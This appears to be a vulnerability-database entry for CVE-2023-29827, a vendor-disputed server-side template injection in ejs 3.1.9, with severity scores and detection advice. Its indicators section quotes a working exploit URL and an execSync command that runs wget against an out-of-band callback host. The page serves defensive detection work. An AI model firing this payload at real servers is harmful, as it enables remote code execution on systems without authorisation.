cbcvebase.
CVE-2023-29827
published 2023-05-04

CVE-2023-29827: ejs v3.1.9 is vulnerable to server-side template injection. If the ejs file is controllable, template injection can be implemented through the configuration…

PriorityP263critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
5.55%
91.9th percentile
ejs v3.1.9 is vulnerable to server-side template injection. If the ejs file is controllable, template injection can be implemented through the configuration settings of the closeDelimiter parameter. NOTE: this is disputed by the vendor because the render function is not intended to be used with untrusted input.

Affected

2 ranges
VendorProductVersion rangeFixed in
debiannode-ejs
ejsejs>= 3.1.9

Detection & IOCsextracted from sources · hover to see the quote

url{{BaseURL}}/page?settings[view%20options][closeDelimiter]=x%22)%3bprocess.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27)%3b//
commandprocess.mainModule.require('child_process').execSync('wget http://{{interactsh-url}}');
  • Detect SSTI exploitation attempts against EJS via the `closeDelimiter` parameter in the `view options` settings object passed through HTTP query parameters.
  • Look for HTTP GET requests containing `settings[view%20options][closeDelimiter]` or `settings[view options][closeDelimiter]` in the query string as a strong indicator of CVE-2023-29827 exploitation.
  • Monitor for out-of-band HTTP interactions (e.g., interactsh/OAST callbacks) triggered from Node.js processes, which may indicate successful RCE via EJS SSTI.
  • Flag any Node.js process invoking `process.mainModule.require('child_process').execSync` originating from a web request handler, as this is the canonical payload pattern for this CVE.
  • ·The vulnerability is disputed by the EJS vendor; the render function is explicitly documented as not intended for use with untrusted input. Detection should be tuned to environments where user-controlled input reaches EJS render calls.
  • ·The Nuclei template targets a specific response body string to confirm exploitability; detections should also check for this application-specific response to reduce false positives.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
osv9.8CRITICAL
vendor_debian9.8LOW
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.